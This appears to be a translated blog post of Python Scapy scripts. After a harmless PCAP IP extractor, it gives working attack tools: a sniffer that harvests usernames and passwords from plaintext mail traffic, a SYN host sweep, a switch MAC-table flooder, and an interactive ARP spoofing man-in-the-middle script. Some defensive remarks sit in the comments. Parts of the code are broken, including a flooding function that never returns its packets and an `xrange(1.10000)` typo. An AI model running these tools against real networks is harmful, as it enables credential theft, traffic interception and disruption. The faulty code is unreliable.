Wechat official account: Operation and maintenance development story, author: Wanger
Get the IP addresses in a PCAP file
from __future__ import print_function

import sys
from sys import argv

from scapy.all import rdpcap, IP
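def help_text():
    """Print the usage line to stderr and exit with status 1.

    Called when no pcap path was given. The original called ``sys.exit``
    without ``sys`` being imported (only ``argv`` was), which raised
    NameError instead of showing usage; the non-zero status lets shell
    callers distinguish a usage error from a successful run.
    """
    print("Usage: python all_devices.py path_to_pcap", file=sys.stderr)
    sys.exit(1)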
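def extract_host_names(pcap):
    """Return the unique IPv4 addresses seen in a capture, in first-seen order.

    Every packet carrying an IP layer contributes both its source and its
    destination address; packets without one are skipped. Each newly
    discovered address is printed together with its running count so the
    console output matches the final list.

    Args:
        pcap: path to the capture file, handed to scapy's ``rdpcap``.

    Returns:
        list of address strings ordered by first appearance.

    Note:
        scapy's ``IP`` layer is IPv4 only, so IPv6-only traffic is not
        reported by this function.
    """
    machines = []
    seen = set()  # O(1) membership test; ``machines`` keeps discovery order
    for packet in rdpcap(pcap):
        if not packet.haslayer(IP):
            continue
        ip_layer = packet[IP]
        # Check src and dst independently. The original ``elif`` skipped the
        # destination whenever the source was new, so a host that only ever
        # appeared as the destination of such packets was never recorded.
        for address in (ip_layer.src, ip_layer.dst):
            if address not in seen:
                seen.add(address)
                machines.append(address)
                print(len(machines), address)
    return machines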
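if __name__ == '__main__':
    # Check the argument count before indexing argv; the original read
    # argv[1] first, so a missing path raised IndexError before the usage
    # text could be shown.
    if len(argv) < 2:
        help_text()
    pcap = argv[1]
    print("\nList of all the hosts in pcap =>", extract_host_names(pcap), end="\n\n")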
Example: pass the PCAP file name to obtain the IP addresses
[root@VM-8-14-centos ~]# python3 get_pcapip.py 1.pcap
1 10.0.8.14
2 117.136.38.151
3 169.254.128.18
4 111.123.51.131
5 140.249.214.101
6 169.254.0.4
7 169.254.128.8
8 20.84.56.71
9 169.254.0.55
10 107.189.28.77
11 183.60.82.98
12 165.22.179.40
13 113.128.10.75
14 104.248.123.197
List of all the hosts in pcap => ['10.0.8.14', '117.136.38.151', '169.254.128.18', '111.123.51.131', '140.249.214.101', '169.254.0.4', '169.254.128.8', '20.84.56.71', '169.254.0.55', '107.189.28.77', '183.60.82.98', '165.22.179.40', '113.128.10.75', '104.248.123.197']
Sniff usernames and passwords in mail traffic
from scapy.all import *
def packet_callback(packet) :
    """Print TCP payloads on the mail ports that contain "user" or "pass".

    Illustrates why plaintext POP3/SMTP/IMAP expose credentials to anyone
    on the path: the check is a bare substring match on the payload. The
    mitigation is transport encryption (IMAPS/POP3S, SMTP with STARTTLS);
    once the session is encrypted the payload seen here is ciphertext and
    the match never fires.
    """
    if packet[TCP].payload:
        # NOTE(review): presumably meant to turn the raw bytes into text;
        # on Python 3 str() of a scapy layer may not do that — verify.
        mail_packet = str(packet[TCP].payload)
        if "user" in mail_packet.lower() or "pass" in mail_packet.lower():
            print ("[*] Server: %s" % packet[IP].dst)
            print ("[*] %s" % packet[TCP].payload)
# Capture only the three plaintext mail ports; store=0 keeps scapy from
# buffering every packet in memory. Raw-socket capture needs elevated
# privileges on the host.
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0)
Detect live hosts using SYN packets
from __future__ import print_function
from scapy.all import IP, TCP, sr1, sr
import sys
import logging
# Raise scapy's runtime logger to ERROR so only real failures reach the console.
scapy_logger = logging.getLogger("scapy.runtime")
scapy_logger.setLevel(logging.ERROR)
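def help_text():
    """Print the usage text to stderr and exit with status 1.

    Only reached when the network range argument is missing, so a
    non-zero exit status is the correct signal to a calling shell.
    """
    print("\nUsage:\n python hd_tcp_syn.py network_range\n", file=sys.stderr)
    sys.exit(1)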
def host_discovery(network_range) :
    """Send one TCP SYN to port 80 per address in *network_range* and print responders.

    Any reply at all (the code does not inspect flags) marks the host as
    alive; the 1 s timeout bounds the wait for silent addresses. From the
    defender's side this is the textbook sweep signature — many SYNs to a
    single port from one source in a short window — which IDS rules and
    flow logs surface readily.
    """
    ans,unans=sr( IP(dst=network_range)/TCP(dport=80,flags="S"),verbose=0,timeout=1)
    # ``lambda (s, r):`` is Python 2 tuple-parameter syntax; it is a
    # SyntaxError on Python 3.
    ans.summary(lambda(s,r):r.sprintf("\n %IP.src% is alive\n"))
if __name__ == '__main__':
    # Usage check happens before argv[1] is read, so a missing argument
    # shows help instead of raising IndexError.
    if len(sys.argv) < 2:
        help_text()
    network_range = sys.argv[1]
    host_discovery(network_range)
Switch MAC address table flooding attacks
The principle of MAC flooding on switches has been described in previous articles
from scapy.all import Ether, IP, TCP, RandIP, RandMAC, sendp
def generate_packets() :
    """Build frames with random source/destination MAC and IP addresses.

    This is the CAM-table exhaustion primitive described in the article:
    a switch that learns a flood of spurious source MACs can run out of
    table space. The defensive controls are port-security / MAC-address
    limits on access ports, and a sudden spike in learned MAC addresses
    on one port is the signal worth alerting on.
    """
    # Initialize the packet list
    packet_list = []
    # Fill the packet_list with 10,000 random Ethernet packets
    # (xrange is a Python 2 builtin)
    for i in xrange(1.10000):
        packet = Ether(src = RandMAC(),dst= RandMAC())/IP(src=RandIP(),dst=RandIP())
        packet_list.append(packet)
def cam_overflow(packet_list) :
    """Send *packet_list* at layer 2 on the hard-coded interface ``eth0``."""
    sendp(packet_list, iface='eth0')
if __name__ == '__main__':
    # Build the frames, then hand whatever generate_packets() returns to
    # the sender.
    packet_list = generate_packets()
    cam_overflow(packet_list)
ARP man-in-the-middle spoofing attack
The principle of ARP spoofing has been introduced before
from scapy.all import *
import sys
import os
import time
# Interactive setup: interface, victim and gateway addresses are read from
# the operator (raw_input is a Python 2 builtin). These names are module
# globals read by get_mac/reARP/trick/mitm below.
try:
    interface = raw_input("[*] Enter Interface: ")
    victimIP = raw_input("[*] Enter Victim IP: ")
    gateIP = raw_input("[*] Enter Router IP: ")
except KeyboardInterrupt:
    print ("\n[*] User Requested Close")
    print ("[*] Exiting...")
    sys.exit(1)

print ("\n[*] Enabling IP Forwarding... \n")
# Kernel forwarding is what lets the redirected traffic keep flowing
# through this host instead of being dropped. On a workstation that has no
# business routing, ip_forward flipping to 1 is itself an indicator worth
# monitoring; it is left enabled after the script exits.
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
def get_mac(IP) :
    """Resolve *IP* to a MAC address with a broadcast ARP request on ``interface``.

    Returns the Ether source of the first reply, or ``None`` when nothing
    answers within 2 s (the loop simply does not run). Note the parameter
    name shadows scapy's ``IP`` class inside this function, and
    ``conf.verb = 0`` mutes scapy output globally as a side effect.
    """
    conf.verb = 0
    ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1)
    for snd,rcv in ans:
        return rcv.sprintf(r"%Ether.src%")
def reARP() :
    """Re-advertise the genuine victim/gateway MACs to both sides, then exit.

    Seven broadcast ARP replies per direction restore the caches that
    ``trick`` overwrote. For a defender the whole sequence — the gateway IP
    advertised with one MAC, then another, in unsolicited replies — is
    exactly what arpwatch-style monitoring or switch Dynamic ARP Inspection
    records; this restore phase is as visible as the poisoning.
    """
    print ("\n[*] Restoring Targets...")
    victimMAC = get_mac(victimIP)
    gateMAC = get_mac(gateIP)
    send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7)
    send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7)
    print ("[*] Shutting Down...")
    # Exits the process, so the caller's loop never continues past this call.
    sys.exit(1)
def trick(gm, vm) :
    """Send one unsolicited ARP reply to each side claiming the other's IP.

    ``gm``/``vm`` are the gateway and victim MACs used only as the
    ``hwdst`` of the replies; the ``hwsrc`` is left at scapy's default,
    i.e. this host's own MAC, which is what each cache ends up holding.
    """
    send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm))
    send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm))
def mitm() :
    """Resolve both MACs, then re-poison victim and gateway every 1.5 s until Ctrl-C.

    Defender's view: a steady 1.5 s cadence of unsolicited ARP replies
    that map the gateway IP to a non-gateway MAC is the signature that
    arpwatch-style monitoring and Dynamic ARP Inspection are built to
    catch; static ARP entries on critical hosts blunt the attack.
    """
    # NOTE(review): get_mac returns None rather than raising when nobody
    # answers, so these handlers only fire on errors raised by scapy itself.
    try:
        victimMAC = get_mac(victimIP)
    except Exception:
        print ("[!] Couldn't Find Victim MAC Address")
        print ("[!] Exiting...")
        sys.exit(1)
    try:
        gateMAC = get_mac(gateIP)
    except Exception:
        print ("[!] Couldn't Find Gateway MAC Address")
        print ("[!] Exiting...")
        sys.exit(1)
    print ("[*] Poisoning Targets...")
    while 1:
        try:
            trick(gateMAC, victimMAC)
            time.sleep(1.5)
        except KeyboardInterrupt:
            # reARP() ends with sys.exit(1), so the break below is never reached.
            reARP()
            break
if __name__ == '__main__':
    # The interactive prompts and ip_forward change above run at import
    # time, before this guard; only the poisoning loop is gated by it.
    mitm()